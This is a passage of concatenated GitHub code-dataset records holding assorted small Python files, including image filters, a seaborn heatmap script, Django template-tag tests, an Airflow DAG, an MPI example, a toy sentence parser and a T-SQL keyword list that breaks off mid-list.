newImg.save('image' + str(counter) + '.jpg')\n\n\ndef negativePic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(FIND_EDGES)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef histogramEqualize(curImg, counter):\n current = Image.open(curImg)\n newImg = ImageOps.equalize(current, mask=None)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef LucyRestoration(curImg):\n current = Image.open(curImg)\n Lucy_Restoration(current)\n\ndef histogramEqualize_2(curImg, counter):\n current = Image.open(curImg)\n img_gray = current.convert(mode='L') # convert to grayscale\n img_array = np.asarray(img_gray) #convert to NumPy array\n\n histogram_array = np.bincount(img_array.flatten(), minlength=256) #flatten image array and calculate histogram via binning\n \n num_pixels = np.sum(histogram_array)\n histogram_array = histogram_array/num_pixels\n\n chistogram_array = np.cumsum(histogram_array)\n\n transform_map = np.floor(255 * chistogram_array).astype(np.uint8)\n\n img_list = list(img_array.flatten())\n\n eq_img_list = [transform_map[p] for p in img_list]\n\n eq_img_array = np.reshape(np.asarray(eq_img_list), img_array.shape)\n\n eq_img = Image.fromarray(eq_img_array, mode='L') #convert NumPy array to pillow Image and write to file\n eq_img.save('image' + str(counter) + '.jpg')","repo_name":"chungiee/CPE462_ImageProcessing","sub_path":"editFunctions.py","file_name":"editFunctions.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6906645829","text":"import numpy as np\nimport sklearn.datasets as sk_dataset\nimport pandas as pd\nimport sklearn.preprocessing as pre_processing\nimport random\nfrom collections import Counter, defaultdict\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.impute import SimpleImputer\nfrom sklearn import metrics\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef max2(x):\n xp=x.copy()\n xp[xp == 1] = 0.002\n max=np.max(xp)\n return max\n\nplt.rcParams[\"font.weight\"] = \"bold\"\nplt.rcParams[\"axes.labelweight\"] = \"bold\"\nX = np.loadtxt('../数据集/[013]segment(0-1).txt')\nXp = pd.DataFrame(X[:,:-1])\n\nXp.rename(columns = {0: 'A1', 1: '', 2: 'A3', 3: '', 4: 'A5', 5: '', 6: 'A7', 7: '', 8: 'A9', 9: '',10: 'A11', 11: '', 12: 'A13', 13: '', 14: 'A15', 15: '', 16: 'A17', 17: '', 18: 'A19'},\n inplace = True)\n\n\nXp_corr=abs(Xp.corr())\nXp=np.array(Xp)\nmax=max2(Xp)\nprint(max)\nmin=np.min(Xp)\nprint(min)\n\n\nprint(Xp)\nsns.heatmap(Xp_corr, annot = False, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\n\nXp1=pd.DataFrame(X[:,[5,6,7,8]])\n\nXp1.rename(columns = {0: 'A6', 1: 'A7', 2: 'A8', 3: 'A9'},\n inplace = True)\n\n\nXp1=abs(Xp1.corr())\nXp2=pd.DataFrame(X[:,[9,10,11,12,14,16]])\n\nXp2.rename(columns = {0: 'A10', 1: 'A11',2: 'A12', 3: 'A13', 4: 'A15',5:'A17'},\n inplace = True)\n\n\nXp2=abs(Xp2.corr())\nsns.heatmap(Xp1, annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\nsns.heatmap(Xp2,annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\n\n\nXp3=pd.DataFrame(X[:,[9,10,11,12,14,16,8]])\n\n\nXp3.rename(columns = {0: 'A10', 1: 'A11',2: 'A12', 3: 'A13', 4: 'A15',5:'A17',6:'A9'},\n inplace = True)\n\n\nXp3=abs(Xp3.corr())\nsns.heatmap(Xp3, annot = True, vmin = min, vmax = max, cmap = \"hot_r\",\n annot_kws = {'size': 8, 'weight': 'bold'})\nplt.show()\n\n\n\n\n\n\n\n","repo_name":"ouguiliang110/NaiveBayesNetCheck","sub_path":"属性分组的RVFL集成方法/相关性对比算法.py","file_name":"相关性对比算法.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"13514991284","text":"import os\nfrom unittest.mock import patch\n\nfrom django.http import HttpRequest\nfrom django.template import engines\nfrom django.test import SimpleTestCase, TestCase, override_settings\n\nfrom core.tests.templatetags.test_svg_icon import VALID_SVG\n\n\n@override_settings(\n STATICFILES_DIRS=[\n os.path.join(os.path.dirname(__file__), \"staticfiles\"),\n ]\n)\nclass SvgIconTests(TestCase):\n def setUp(self):\n self.jinja_engine = engines[\"wagtail-env\"]\n\n def test_jinja_tag(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"test\") }}')\n self.assertEqual(template.render(), VALID_SVG)\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"test\")\n def test_jinja_tag_fallback(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"invalid\") }}')\n self.assertEqual(template.render(), VALID_SVG)\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"missing\")\n def test_jinja_tag_fallback_not_found_error(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"missing\") }}')\n with self.assertRaises(FileNotFoundError):\n template.render()\n\n @patch(\"core.templatetags.svg_icon.FALLBACK_ICON_NAME\", \"invalid\")\n def test_jinja_tag_fallback_invalid_error(self):\n template = self.jinja_engine.from_string('{{ svg_icon(\"invalid\") }}')\n with self.assertRaises(ValueError):\n template.render()\n\n\n@override_settings(FLAGS={\"MY_FLAG\": [(\"boolean\", True)]})\nclass FeatureFlagTests(TestCase):\n def setUp(self):\n self.jinja_engine = engines[\"wagtail-env\"]\n\n def test_flag_enabled_tag(self):\n template = self.jinja_engine.from_string(\n '{{ flag_enabled(\"MY_FLAG\") }}'\n )\n self.assertEqual(template.render({\"request\": None}), \"True\")\n\n def test_flag_disabled_tag(self):\n template = self.jinja_engine.from_string(\n '{{ flag_disabled(\"MY_FLAG\") }}'\n )\n self.assertEqual(template.render({\"request\": None}), \"False\")\n\n\nclass SlugifyUniqueTests(SimpleTestCase):\n def setUp(self):\n self.engine = engines[\"wagtail-env\"]\n self.template = '{{ \"Some text\" | slugify_unique }}'\n\n def render(self, template, context=None):\n return self.engine.from_string(template).render(context=context)\n\n def test_no_context(self):\n self.assertEqual(self.render(self.template), \"some-text\")\n\n def test_no_request_in_context(self):\n self.assertEqual(self.render(self.template, {}), \"some-text\")\n\n def test_render_with_request_in_context(self):\n self.assertEqual(\n self.render(self.template, {\"request\": HttpRequest()}), \"some-text\"\n )\n\n def test_render_uses_request_to_make_multiple_unique_slugs(self):\n request = HttpRequest()\n template = \" and \".join([self.template, self.template])\n self.assertEqual(\n self.render(template, {\"request\": request}),\n \"some-text and some-text-1\",\n )\n\n def test_render_without_request_repeats_slugs(self):\n template = \" and \".join([self.template, self.template])\n self.assertEqual(self.render(template), \"some-text and some-text\")\n\n def test_multiple_renders_multiple_unique_slugs(self):\n request = HttpRequest()\n rendered = [\n self.render(self.template, {\"request\": request}) for _ in range(5)\n ]\n\n self.assertEqual(\n rendered,\n [\n \"some-text\",\n \"some-text-1\",\n \"some-text-2\",\n \"some-text-3\",\n \"some-text-4\",\n ],\n )\n\n def test_different_requests_allow_repeats(self):\n for _ in range(5):\n self.assertEqual(\n self.render(self.template, {\"request\": HttpRequest()}),\n \"some-text\",\n )\n\n\nclass LanguageTagTests(SimpleTestCase):\n def setUp(self):\n self.engine = engines[\"wagtail-env\"]\n\n def render(self, template):\n return self.engine.from_string(template).render()\n\n def test_english_translation(self):\n self.assertEqual(\n self.render(\n \"{% language 'en' %}{{ _( 'English' ) }}{% endlanguage %}\"\n ),\n \"English\",\n )\n\n def test_spanish_translation(self):\n self.assertEqual(\n self.render(\n \"{% language 'es' %}{{ _( 'English' ) }}{% endlanguage %}\"\n ),\n \"Inglés\",\n )\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/core/tests/test_jinja2tags.py","file_name":"test_jinja2tags.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"}
+{"seq_id":"71647619948","text":"\nimport json\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef preprocess(train_data_path: str, test_data_path: str, json_path: str):\n df_train = pd.read_csv(train_data_path).drop(\"ID\", axis=1)\n df_test = pd.read_csv(test_data_path).drop(\"ID\", axis=1)\n\n # concatenate\n df_test[\"price\"] = \"test\"\n df = pd.concat([df_train, df_test], axis=0)\n\n # add region column\n with open(json_path, \"r\") as f:\n df[\"region\"] = df[\"loc\"].map(json.load(f))\n\n # bedroom to bathroom ratio\n df[\"bed_bath_ratio\"] = df[\"bedroom\"] / df[\"bathroom\"]\n\n # encode title column by ranks based on highest mean prices\n title_ranks = (\n df_train.groupby(\"title\")[\"price\"]\n .mean()\n .sort_values(ascending=False)\n .rank(method=\"dense\")\n .astype(int)\n )\n df[\"title_rank\"] = df[\"title\"].map(title_ranks)\n df.drop(\"title\", axis=1, inplace=True)\n\n # rearrange to ensure 'price' is the last column\n price_col = df.pop(\"price\")\n df.insert(len(df.columns), \"price\", price_col)\n\n # split\n df_train = df[~df[\"price\"].astype(str).str.contains(\"test\")]\n df_test = df[df[\"price\"].astype(str).str.contains(\"test\")]\n\n df_train = df_train.reset_index(drop=True)\n df_test = df_test.reset_index(drop=True)\n\n # label encoding\n le = LabelEncoder()\n\n for col in [\"loc\", \"region\"]:\n le = le.fit(df_train[col])\n df_train[col] = le.transform(df_train[col])\n df_test[col] = le.transform(df_test[col])\n\n # another split\n X = df_train.drop(\"price\", axis=1)\n y = df_train[\"price\"].astype(float)\n X_test = df_test.drop(\"price\", axis=1)\n\n\n # fill null values\n imp_mode = SimpleImputer(missing_values=np.nan, strategy=\"most_frequent\")\n imp_mode.fit(X)\n\n X = pd.DataFrame(imp_mode.transform(X), columns=X.columns)\n X_test = pd.DataFrame(imp_mode.transform(X_test), columns=X.columns)\n\n # scale the dataset with standard scaler\n scaler = StandardScaler()\n train_scaler = scaler.fit(X)\n X = train_scaler.transform(X)\n X_test = train_scaler.transform(X_test)\n \n # make X a dataframe again\n X = pd.DataFrame(X, columns=df_train.columns[0:-1])\n\n return X, y, X_test\n\n\nif __name__ == \"__main__\":\n preprocess()\n","repo_name":"veronicaeyo/house_price_prediction","sub_path":"scripts/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26011028519","text":"# PROJECT EULER PROBLEM 72 - Counting Fractions\n\nfrom findDivisorsII import findDivisors\nfrom findFactorsII import findFactors\nfrom memoise import Memoise\nimport primeCheckII\n\n@Memoise\ndef countFractions(N):\n s = N-1\n if not primeCheckII.PrimeCheck(N): \n D = findDivisors(N,False,False)\n s -= sum([countFractions(d) for d in D])\n return(s)\n\n\nmax_N = 1000000\ntotal = 0\nfor N in range(max_N,1,-1):\n if N%1000 == 0:\n print(N)\n total += countFractions(N)\n\nprint(total)\n\n","repo_name":"randolchance/PythonProjects","sub_path":"ProjectEulerSolutions/PE72/PE72-CountingFractions.py","file_name":"PE72-CountingFractions.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10193153328","text":"#!/usr/bin/env python3\n\nimport sys\n\nx = open(sys.argv[1], 'r').read()\nx = x.split('\\n')\nc = 0\narr = []\nfor i in x:\n if i != '': c+=1\n else: arr.append(c); c = 0\n\nprint(sum(arr)/len(arr))\n","repo_name":"psuriset/kvm_io","sub_path":"extract_pattern.py","file_name":"extract_pattern.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"74104195948","text":"from airflow import DAG, Dataset\r\nfrom airflow.decorators import task\r\n\r\nfrom datetime import datetime\r\n\r\n# Here is a dataset\r\nmy_file = Dataset('/tmp/my_file.txt')\r\nmy_file_2 = Dataset('/tmp/my_file_2.txt')\r\n\r\n# We create the Producer DAG\r\n# This DAG is in charge of updating the dataset that will trigger the consumer DAG\r\nwith DAG(\r\n dag_id=\"producer\",\r\n schedule=\"@daily\",\r\n start_date=datetime(2023, 1, 5),\r\n):\r\n\r\n # Here is a task that uses the dataset\r\n #we indicate what task updates the dataset usning the outlets parameter\r\n @task(outlets=[my_file])\r\n def update_dataset():\r\n with open(my_file.uri, \"a+\") as f:\r\n f.write(\"producer update\")\r\n\r\n @task(outlets=[my_file_2])\r\n def update_dataset_2():\r\n with open(my_file_2.uri, \"a+\") as f:\r\n f.write(\"producer update\")\r\n \r\n update_dataset() >> update_dataset_2()","repo_name":"fmaver/Airflow","sub_path":"dags/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18489473781","text":"from osoba import Osoba\n\nclass Pracownik(Osoba):\n def __init__(self,imie,wiek,waga,wzrost,firma,stanowisko,latapracy,wynagrodzenie):\n super().__init__(imie,wiek,waga,wzrost)\n self.firma = firma\n self.stanowisko = stanowisko\n self.latapracy = latapracy\n self.wynagrodzenie = wynagrodzenie\n self.pracownik = True\n\n def print_pracownik(self):\n print(f'dane pracownika -> firma: {self.firma}, stanowisko pracy: {self.stanowisko}, '\n f'lata pracy: {self.latapracy}, wynagrodzenie: {self.wynagrodzenie} zł')\n \n \n \n","repo_name":"albim72/PYTHON_Z12","sub_path":"DZIEN_2/OSOBY_/pracownik.py","file_name":"pracownik.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"21636475198","text":"from mpi import MPI\nfrom mpi import constants\n\nmpi = MPI()\nworld = mpi.MPI_COMM_WORLD\n\nrank = world.rank()\nsize = world.size()\n\nhandles = []\n\nfor i in range(100):\n if rank == 0:\n # This rank receives every message received by the other \n # processes. \n for j in range(size-1):\n handle = world.irecv(constants.MPI_SOURCE_ANY) \n handles.append(handle)\n\n while handles:\n request_list = world.testsome(handles)\n if request_list:\n # Finish the request\n world.waitall(request_list)\n handles = [ r for r in handles if r not in request_list]\n\n else:\n world.send(0, \"My data\", constants.MPI_TAG_ANY)\n\nmpi.finalize()\n","repo_name":"jamitzky/pupyMPI","sub_path":"pupympi/examples/testsome.py","file_name":"testsome.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"27215484018","text":"\"\"\"login_proj URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.default_books_view, name='books_main'),\n path('', views.book_by_id, name='books_by_id'),\n path('get_books', views.get_books, name='get_books'),\n path('add_book', views.add_book, name='add_book'),\n path('toggle_favorite', views.toggle_favorite, name='toggle_favorite'),\n]\n","repo_name":"twtseng/Dojo_Assignments","sub_path":"Python/django/django_full_stack/favorite_books_proj/favorite_books_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"41034213078","text":"#_*_coding=utf-8_*_\n\nclass ParserError(Exception):\n\tpass\n\nclass Sentence(object):\n\t\n\tdef __init__(self, subject, verb, object):\n\t\t# remember we take ('noun', 'princess') tuples and convert them\n\t\tself.subject = subject[1]\n\t\tself.verb = verb[1]\n\t\tself.object = object[1]\n\n# 用 peek函数识别下一个单词类型\ndef peek(word_list): # 例子:word_list = [('verb', 'open'), ('stop','the'), ('noun', 'door')]\n\tif word_list: #\n\t\tword = word_list[0] # word = ('verb', 'open')\n\t\treturn word[0] # word[0] = 'verb'\n\telse:\n\t\treturn \"错误1\"\n\n# 用 match函数匹配单词\ndef match(word_list, expecting): # match(word_list, 'verb')\n\tif word_list:\n\t\tword = word_list.pop(0) # 删除 word_list 中 ('verb', 'open'), 将其传递给 word\n\n\t\tif word[0] == expecting: # word[0] = 'verb'\n\t\t\treturn word # 返回('verb', 'open')\n\t\telse:\n\t\t\treturn \"错误2\"\n\t\t\n\telse:\n\t\treturn \"错误3\"\n\n# 用 skip函数筛选符合单词类型的单词,对其执行 match函数\ndef skip(word_list, word_type):\n\twhile peek(word_list) == word_type: # peek(word_list)返回'verb'\n\t\tmatch(word_list, word_type) # match 返回 ('verb', 'open')\n\n\n# 用 parse_verb取出 verb类型的元组\ndef parse_verb(word_list):\n skip(word_list, 'stop') # 用 skip函数筛选 stop类型的单词\n \n if peek(word_list) == 'verb': # 如果下一个单词是 verb类型的单词,则匹配\n return match(word_list, 'verb') # verb,并返回值\n else:\n raise ParserError(\"Expected a verb next.\")\n\n# 用 parse_object函数筛选目标单词(名词和方向词)\ndef parse_object(word_list):\n\tskip(word_list, 'stop') # 在单词列表(word_list)中筛选修饰词(stop)\n\tnext = peek(word_list) # 取出单词列表(word_list)中的第一个单词\n\t\n\tif next == 'noun': \n\t\treturn match(word_list, 'noun') # 匹配名词\n\tif next == 'direction':\n\t\treturn match(word_list, 'direction') # 匹配方向词\n\telse:\n\t\traise ParserError(\"Expected a noun or direction next.\")\n\n# 用 parse_subject函数得到三个值:subj由 parse_sentence 待定、动词、名词或方向词待定、动词、名词或方向词\ndef parse_subject(word_list, subj):\n\tverb = parse_verb(word_list) # 动词\n\tobj = parse_object(word_list) # 名词或方向词\n\t\n\treturn Sentence(subj, verb, obj) #\n\n# 用 parse_sentence函数获得三个值:\ndef parse_sentence(word_list):\n\tskip(word_list, 'stop') # 跳过动词\n\t\n\tstart = peek(word_list) # 获得名词或动词\n\t\n\tif start == 'noun': # 如果是名词\n\t\tsubj = match(word_list, 'noun') # 获得名词的值给subj\n\t\treturn parse_subject(word_list, subj) # 调用 parse_subject 得到三个值\n\telif start == 'verb': # 如果是动词\n\t\t# assume the subject is the player then (假设主题是玩家)\n\t\treturn parse_subject(word_list, ('noun', 'player'))\n\telse:\n\t\traise ParserError(\"Must start with subject, object, or verb not: %s\" %\nstart)\n","repo_name":"PzoHua/learnpython2","sub_path":"ex49/skeleton/ex49/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1027072477","text":"def main():\n cars = ['Honda', 'Toyota', 'Nissan']\n \n # for loops are used to iterate over sequences\n \n # this loop will run 3 times printing one of the strings from the cars list each time\n for x in cars:\n print(x)\n \n # this loop will run 5 times printing each letter of the word Honda each time\n for x in cars[0]:\n print(x)\n\n # this loop will run 13 times printing the number one, incrementing x by two then printing\n # again until reaching 26 which will not be printed\n for x in range(1, 26, 2):\n print(x)\n else:\n print('That is all of the odd numbers 1 - 25')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wyatthoffman4392/recruiters-who-code-python","sub_path":"loops/for-loop.py","file_name":"for-loop.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"8397578421","text":"OPERATORS = (\n '!<',\n '!=',\n '!>',\n '<',\n '<=',\n '<>',\n '=',\n '>',\n '>=',\n '+',\n '+=',\n '-',\n '-=',\n '*',\n '*=',\n '/',\n '/=',\n '%',\n '%=',\n '&',\n '&=',\n '|',\n '|=',\n '^',\n '^=',\n '~',\n '::',\n)\n\nOPERATOR_WORDS = (\n 'all',\n 'and',\n 'any',\n 'between',\n 'except',\n 'exists',\n 'in',\n 'intersect',\n 'like',\n 'not',\n 'or',\n 'some',\n 'union',\n)\n\n_KEYWORDS_SERVER = (\n 'add',\n 'all',\n 'alter',\n 'and',\n 'any',\n 'as',\n 'asc',\n 'authorization',\n 'backup',\n 'begin',\n 'between',\n 'break',\n 'browse',\n 'bulk',\n 'by',\n 'cascade',\n 'case',\n 'catch',\n 'check',\n 'checkpoint',\n 'close',\n 'clustered',\n 'coalesce',\n 'collate',\n 'column',\n 'commit',\n 'compute',\n 'constraint',\n 'contains',\n 'containstable',\n 'continue',\n 'convert',\n 'create',\n 'cross',\n 'current',\n 'current_date',\n 'current_time',\n 'current_timestamp',\n 'current_user',\n 'cursor',\n 'database',\n 'dbcc',\n 'deallocate',\n 'declare',\n 'default',\n 'delete',\n 'deny',\n 'desc',\n 'disk',\n 'distinct',\n 'distributed',\n 'double',\n 'drop',\n 'dump',\n 'else',\n 'end',\n 'errlvl',\n 'escape',\n 'except',\n 'exec',\n 'execute',\n 'exists',\n 'exit',\n 'external',\n 'fetch',\n 'file',\n 'fillfactor',\n 'for',\n 'foreign',\n 'freetext',\n 'freetexttable',\n 'from',\n 'full',\n 'function',\n 'goto',\n 'grant',\n 'group',\n 'having',\n 'holdlock',\n 'identity',\n 'identity_insert',\n 'identitycol',\n 'if',\n 'in',\n 'index',\n 'inner',\n 'insert',\n 'intersect',\n 'into',\n 'is',\n 'join',\n 'key',\n 'kill',\n 'left',\n 'like',\n 'lineno',\n 'load',\n 'merge',\n 'national',\n 'nocheck',\n 'nonclustered',\n 'not',\n 'null',\n 'nullif',\n 'of',\n 'off',\n 'offsets',\n 'on',\n 'open',\n 'opendatasource',\n 'openquery',\n 'openrowset',\n 'openxml',\n 'option',\n 'or',\n 'order',\n 'outer',\n 'over',\n 'percent',\n 'pivot',\n 'plan',\n 'precision',\n 'primary',\n 'print',\n 'proc',\n 'procedure',\n 'public',\n 'raiserror',\n 'read',\n 'readtext',\n 'reconfigure',\n 'references',\n 'replication',\n 'restore',\n 'restrict',\n 'return',\n 'revert',\n 'revoke',\n 'right',\n 'rollback',\n 'rowcount',\n 'rowguidcol',\n 'rule',\n 'save',\n 'schema',\n 'securityaudit',\n 'select',\n 'semantickeyphrasetable',\n 'semanticsimilaritydetailstable',\n 'semanticsimilaritytable',\n 'session_user',\n 'set',\n 'setuser',\n 'shutdown',\n 'some',\n 'statistics',\n 'system_user',\n 'table',\n 'tablesample',\n 'textsize',\n 'then',\n 'throw',\n 'to',\n 'top',\n 'tran',\n 'transaction',\n 'trigger',\n 'truncate',\n 'try',\n 'try_convert',\n 'tsequal',\n 'union',\n 'unique',\n 'unpivot',\n 'update',\n 'updatetext',\n 'use',\n 'user',\n 'values',\n 'varying',\n 'view',\n 'waitfor',\n 'when',\n 'where',\n 'while',\n 'with',\n 'within',\n 'writetext',\n)\n\n_KEYWORDS_FUTURE = (\n 'absolute',\n 'action',\n 'admin',\n 'after',\n 'aggregate',\n 'alias',\n 'allocate',\n 'are',\n 'array',\n 'asensitive',\n 'assertion',\n 'asymmetric',\n 'at',\n 'atomic',\n 'before',\n 'binary',\n 'bit',\n 'blob',\n 'boolean',\n 'both',\n 'breadth',\n 'call',\n 'called',\n 'cardinality',\n 'cascaded',\n 'cast',\n 'catalog',\n 'char',\n 'character',\n 'class',\n 'clob',\n 'collation',\n 'collect',\n 'completion',\n 'condition',\n 'connect',\n 'connection',\n 'constraints',\n 'constructor',\n 'corr',\n 'corresponding',\n 'covar_pop',\n 'covar_samp',\n 'cube',\n 'cume_dist',\n 'current_catalog',\n 'current_default_transform_group',\n 'current_path',\n 'current_role',\n 'current_schema',\n 'current_transform_group_for_type',\n 'cycle',\n 'data',\n 'date',\n 'day',\n 'dec',\n 'decimal',\n 'deferrable',\n 'deferred',\n 'depth',\n 'deref',\n 'describe',\n 'descriptor',\n 'destroy',\n 'destructor',\n 'deterministic',\n 'diagnostics',\n 'dictionary',\n 'disconnect',\n 'domain',\n 'dynamic',\n 'each',\n 'element',\n 'end-exec',\n 'equals',\n 'every',\n 'exception',\n 'false',\n 'filter',\n 'first',\n 'float',\n 'found',\n 'free',\n 'fulltexttable',\n 'fusion',\n 'general',\n 'get',\n 'global',\n 'go',\n 'grouping',\n 'hold',\n 'host',\n 'hour',\n 'ignore',\n 'immediate',\n 'indicator',\n 'initialize',\n 'initially',\n 'inout',\n 'input',\n 'int',\n 'integer',\n 'intersection',\n 'interval',\n 'isolation',\n 'iterate',\n 'language',\n 'large',\n 'last',\n 'lateral',\n 'leading',\n 'less',\n 'level',\n 'like_regex',\n 'limit',\n 'ln',\n 'local',\n 'localtime',\n 'localtimestamp',\n 'locator',\n 'map',\n 'match',\n 'member',\n 'method',\n 'minute',\n 'mod',\n 'modifies',\n 'modify',\n 'module',\n 'month',\n 'multiset',\n 'names',\n 'natural',\n 'nchar',\n 'nclob',\n 'new',\n 'next',\n 'no',\n 'none',\n 'normalize',\n 'numeric',\n 'object',\n 'occurrences_regex',\n 'old',\n 'only',\n 'operation',\n 'ordinality',\n 'out',\n 'output',\n 'overlay',\n 'pad',\n 'parameter',\n 'parameters',\n 'partial',\n 'partition',\n 'path',\n 'percent_rank',\n 'percentile_cont',\n 'percentile_disc',\n 'position_regex',\n 'postfix',\n 'prefix',\n 'preorder',\n 'prepare',\n 'preserve',\n 'prior',\n 'privileges',\n 'range',\n 'reads',\n 'real',\n 'recursive',\n 'ref',\n 'referencing',\n 'regr_avgx',\n 'regr_avgy',\n 'regr_count',\n 'regr_intercept',\n 'regr_r2',\n 'regr_slope',\n 'regr_sxx',\n 'regr_sxy',\n 'regr_syy',\n 'relative',\n 'release',\n 'result',\n 'returns',\n 'role',\n 'rollup',\n 'routine',\n 'row',\n 'rows',\n 'savepoint',\n 'scope',\n 'scroll',\n 'search',\n 'second',\n 'section',\n 'sensitive',\n 'sequence',\n 'session',\n 'sets',\n 'similar',\n 'size',\n 'smallint',\n 'space',\n 'specific',\n 'specifictype',\n 'sql',\n 'sqlexception',\n 'sqlstate',\n 'sqlwarning',\n 'start',\n 'state',\n 'statement',\n 'static',\n 'stddev_pop',\n 'stddev_samp',\n 'structure',\n 'submultiset',\n 'substring_regex',\n 'symmetric',\n 'system',\n 'temporary',\n 'terminate',\n 'than',\n 'time',\n 'timestamp',\n 'timezone_hour',\n 'timezone_minute',\n 'trailing',\n 'translate_regex',\n 'translation',\n 'treat',\n 'true',\n 'uescape',\n 'under',\n 'unknown',\n 'unnest',\n 'usage',\n 'using',\n 'value',\n 'var_pop',\n 'var_samp',\n 'varchar',\n 'variable',\n 'whenever',\n 'width_bucket',\n 'window',\n 'within',\n 'without',\n 'work',\n 'write',\n 'xmlagg',\n 'xmlattributes',\n 'xmlbinary',\n 'xmlcast',\n 'xmlcomment',\n 'xmlconcat',\n 'xmldocument',\n 'xmlelement',\n 'xmlexists',\n 'xmlforest',\n 'xmliterate',\n 'xmlnamespaces',\n 'xmlparse',\n 'xmlpi',\n 'xmlquery',\n 'xmlserialize',\n 'xmltable',\n 'xmltext',\n 'xmlvalidate',\n 'year',\n 'zone',\n)\n\n_KEYWORDS_ODBC = (\n 'absolute',\n 'action',\n 'ada',\n 'add',\n 'all',\n 'allocate',\n 'alter',\n 'and',\n 'any',\n 'are',\n 'as',\n 'asc',\n 'assertion',\n 'at',\n 'authorization',\n 'avg',\n 'begin',\n 'between',\n 'bit',\n 'bit_length',\n 'both',\n 'by',\n 'cascade',\n 'cascaded',\n 'case',\n 'cast',\n 'catalog',\n 'char',\n 'char_length',\n 'character',\n 'character_length',\n 'check',\n 'close',\n 'coalesce',\n 'collate',\n 'collation',\n 'column',\n 'commit',\n 'connect',\n 'connection',\n 'constraint',\n 'constraints',\n 'continue',\n 'convert',\n 'corresponding',\n 'count',\n 'create',\n 'cross',\n 'current',\n 'current_date',\n 'current_time',\n 'current_timestamp',\n 'current_user',\n 'cursor',\n 'date',\n 'day',\n 'deallocate',\n 'dec',\n 'decimal',\n 'declare',\n 'default',\n 'deferrable',\n 'deferred',\n 'delete',\n 'desc',\n 'describe',\n 'descriptor',\n 'diagnostics',\n 'disconnect',\n 'distinct',\n 'domain',\n 'double',\n 'drop',\n 'else',\n 'end',\n 'end-exec',\n 'escape',\n 'except',\n 'exception',\n 'exec',\n 'execute',\n 'exists',\n 'external',\n 'extract',\n 'false',\n 'fetch',\n 'first',\n 'float',\n 'for',\n 'foreign',\n 'fortran',\n 'found',\n 'from',\n 'full',\n 'get',\n 'global',\n 'go',\n 'goto',\n 'grant',\n 'group',\n 'having',\n 'hour',\n 'identity',\n 'immediate',\n 'in',\n 'include',\n 'index',\n 'indicator',\n 'initially',\n 'inner',\n 'input',\n 'insensitive',\n 'insert',\n 'int',\n 'integer',\n 'intersect',\n 'interval',\n 'into',\n 'is',\n 'isolation',\n 'join',\n 'key',\n 'language',\n 'last',\n 'leading',\n 'left',\n 'level',\n 'like',\n 'local',\n 'lower',\n 'match',\n 'max',\n 'min',\n 'minute',\n 'module',\n 'month',\n 'names',\n 'national',\n 'natural',\n 'nchar',\n 'next',\n 'no',\n 'none',\n 'not',\n 'null',\n 'nullif',\n 'numeric',\n 'octet_length',\n 'of',\n 'on',\n 'only',\n 'open',\n 'option',\n 'or',\n 'order',\n 'outer',\n 'output',\n 'overlaps',\n 'pad',\n 